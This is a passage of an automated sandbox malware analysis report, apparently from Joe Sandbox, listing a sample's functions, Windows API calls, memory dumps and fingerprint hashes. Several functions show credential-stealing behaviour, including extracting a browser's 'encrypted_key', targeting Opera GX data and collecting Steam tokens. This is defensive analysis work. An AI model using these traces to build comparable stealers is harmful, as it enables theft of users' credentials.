                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008E1375), ref: 008F28ED
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008F28F4
                                                                                                                                                                                                                                                                                                                    • GetComputerNameA.KERNEL32(00000000,008E1375), ref: 008F2908
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Heap$AllocateComputerNameProcess
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1664310425-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 4e694541f78b2a2047deb20f74ff6b678e053acd18ea1e6d63da551449376963
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0601582afebbce1753a70a97ebdd4bbd3bd884ef41ab029a6e8694f0a15661e1
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e694541f78b2a2047deb20f74ff6b678e053acd18ea1e6d63da551449376963
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46E0ECB5714348BBE7109BEA9C4DFDA7AACEB88B55F104066F706D3290D6B0DA84D620
                                                                                                                                                                                                                                                                                                                    Function 008ED8E5 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 314COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,Opera GX,00917926,00917913,?,?,?), ref: 008ED918
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 008F3A59
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2175: lstrcpy.KERNEL32(00000000,?), ref: 008F2194
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F39EE: GetFileAttributesA.KERNEL32(?,?,?,008EEA72,?,?,?), ref: 008F39F5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E93A4: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?), ref: 008E93EE
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E93A4: lstrlen.KERNEL32(00000001,?,?,?,?,?,?), ref: 008E947F
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcpy$lstrcatlstrlen$AttributesFileFolderPath
                                                                                                                                                                                                                                                                                                                    • String ID: Opera GX
                                                                                                                                                                                                                                                                                                                    • API String ID: 729072150-3280151751
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 77b34a542cea5d69b0619e7664496db4ae1393f449e82a49c0aef6dcb11bb842
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 122717014df09f81163e8de180f114f97aace723267d678c5e199ac356eaeb5f
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77b34a542cea5d69b0619e7664496db4ae1393f449e82a49c0aef6dcb11bb842
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6C1A13290015DAACF10FBBADD429DDBB74FF45304F520421FE04B7262DA75AF5A8A92
                                                                                                                                                                                                                                                                                                                    Function 008E7A3B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,008E7B86,?), ref: 008E7ABA
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 544645111-3916222277
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 2a7665745889e8edd8d58e2dfd9d5c3c3dd033a9926c7f4f392232933fbce618
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 08aef2ea5e3f0f382060546b1993ff626e3bf003153ec3bfee5be0a3d078a874
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a7665745889e8edd8d58e2dfd9d5c3c3dd033a9926c7f4f392232933fbce618
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B911CE7151826AEFEB20CF96D588BADB7E4FB05388F2004389641C3280E774EF41DB60
                                                                                                                                                                                                                                                                                                                    Function 008F03BC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 008F03CC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 00910478: std::exception::exception.LIBCMT ref: 0091048D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 00910478: __CxxThrowException@8.LIBCMT ref: 009104A2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 00910478: std::exception::exception.LIBCMT ref: 009104B3
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                                                                                                                                                                                                                    • String ID: string too long
                                                                                                                                                                                                                                                                                                                    • API String ID: 1823113695-2556327735
                                                                                                                                                                                                                                                                                                                    • Opcode ID: c9662fd55de98ebfed1f57d417472071040b86ef2749fb9fef854e4bc1b67143
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 8601f90585f5050e208f41fab576d352befcf1c8889f6efa1c82ec5aa8938efd
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9662fd55de98ebfed1f57d417472071040b86ef2749fb9fef854e4bc1b67143
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0FF0C23134425D6FDB31997C888083F6696FBA132D3240E2AE393D72C3E661D8808B69
                                                                                                                                                                                                                                                                                                                    Function 008F063A Relevance: 3.1, APIs: 2, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: H_prolog3_catch_memmove
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3914490576-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 557b78d9d83d0127f7d8fd21865163ed9f1afce5f4ef907bc0e0cd71db531083
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0e08cf7d96f341b1ce753933ea557edacd3a198168d71dfc292ddbbdf64c8e3e
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 557b78d9d83d0127f7d8fd21865163ed9f1afce5f4ef907bc0e0cd71db531083
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8213031A0130D9FDB249F68884167EB7A2FBD0320F204619E561DB2C2C775A9909B91
                                                                                                                                                                                                                                                                                                                    Function 008F8D06 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 45stringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008F8D4D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8BE6: CreateThread.KERNEL32(00000000,00000000,008F8B15,?,00000000,00000000), ref: 008F8C85
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 008F8C8D
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • Soft\Steam\steam_tokens.txt, xrefs: 008F8D5D
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                                                                                                                                                                                                                                                    • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                                                                                                                                                                                                                    • API String ID: 502913869-3507145866
                                                                                                                                                                                                                                                                                                                    • Opcode ID: f3ee18e925e029d0d2cb3cb366e8711ae4de6137f865fd97af36d4097ba8c94d
                                                                                                                                                                                                                                                                                                                    • Instruction ID: e324e48193f11220ec3371c544e79980421007e2c47cc66f8f5caf139029c1f1
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3ee18e925e029d0d2cb3cb366e8711ae4de6137f865fd97af36d4097ba8c94d
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE010832E0000DAB8F00FBBADC478DEBB78FF41354F510161BA00E3252DA316A5686A2
                                                                                                                                                                                                                                                                                                                    Function 008F0927 Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000988000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.00000000009C6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Exception@8Throwmalloc
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3608276449-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 19486318639b248b49fba2aed370daaa4b986bbf9c2e1ff60c65586489cca0a3
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 50386ab1e09c98f50b5ce2ef50e5f6feecfe55b1998bc2698a0fbdb200e81158
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19486318639b248b49fba2aed370daaa4b986bbf9c2e1ff60c65586489cca0a3
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29D05B3470420D7ADF117739DC054D97F58EE407787108210BA25E70D3E7B0D9918985
                                                                                                                                                                                                                                                                                                                    Function 008F807F Relevance: 2.6, APIs: 2, Instructions: 101stringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 008F3A59
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 008F80C7
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?), ref: 008F80E5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: wsprintfA.USER32 ref: 008F7D67
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: FindFirstFileA.KERNEL32(?,?), ref: 008F7D7E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: StrCmpCA.SHLWAPI(?,00917AF4), ref: 008F7D9F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: StrCmpCA.SHLWAPI(?,00917AF8), ref: 008F7DB9
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: wsprintfA.USER32 ref: 008F7DE0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: StrCmpCA.SHLWAPI(?,009176B6), ref: 008F7DF4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: wsprintfA.USER32 ref: 008F7E11
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: PathMatchSpecA.SHLWAPI(?,?), ref: 008F7E3E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: lstrcat.KERNEL32(?), ref: 008F7E74
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: lstrcat.KERNEL32(?,00917B10), ref: 008F7E86
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: lstrcat.KERNEL32(?,?), ref: 008F7E99
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: lstrcat.KERNEL32(?,00917B14), ref: 008F7EAB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: lstrcat.KERNEL32(?,?), ref: 008F7EBF
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: wsprintfA.USER32 ref: 008F7E28
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: CopyFileA.KERNEL32(?,?,00000001), ref: 008F7F78
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: DeleteFileA.KERNEL32(?), ref: 008F7FEC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: FindNextFileA.KERNEL32(?,?), ref: 008F804E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F7D20: FindClose.KERNEL32(?), ref: 008F8062
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000091E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000944000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000096D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.000000000097F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000982000.00000040.00000400.00020000.00000000.sdmpDownload File
